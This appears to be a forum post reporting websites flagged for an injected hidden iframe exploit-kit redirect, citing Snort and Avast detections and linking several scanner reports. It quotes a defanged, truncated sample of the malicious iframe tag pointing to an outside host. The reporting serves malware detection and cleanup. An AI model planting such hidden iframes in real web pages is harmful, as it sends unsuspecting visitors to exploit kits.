IDS Snort Alert [1:27242:2] on site - Avast flags as HTML:Iframe-ZG [Trj]

See: http://urlquery.net/report.php?id=7248112
27242 - EXPLOIT-KIT embedded iframe redirection - possible exploit kit indicator

<iframe src="htxp://www.elopet.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" widt same iframe detected here: http://evuln.com/tools/malware-scanner/trasgusi.com/ Injection check: suspicious Text after HTML

Another one and avast! Webshield blocks and detects as HTML: Iframe-ZG[Trj]
Re: https://www.virustotal.com/nl/file/53a34ec13a4456c42499504478cdab125ab28b1a445fd5363de5f76a244c41a4/analysis/
Virustracker verdict: atrium-group.pl,87.98.239.87,dns20.ovh.net,Parked/expired.
Malware down since Mon Nov 5 15:46:15 CET 2012
Snortalert flagged here: http://urlquery.net/report.php?id=8795536
iFrame malware
see: https://www.virustotal.com/nl/url/c29d70138bbc927e9df3c2a574f526fced64c6eb85440803d4b9564b45c619bd/analysis/
Sucuri: http://sitecheck.sucuri.net/results/atrium-group.pl/http://labs.sucuri.net/db/malware/malware-entry-mwiframeenc1560
See: http://support.clean-mx.de/clean-mx/viruses.php?ip=87.98.239.87&sort=email%20asc
and http://zulu.zscaler.com/submission/show/ecbe96ad44a20ace20b006f53fb43c54-1390231579

pol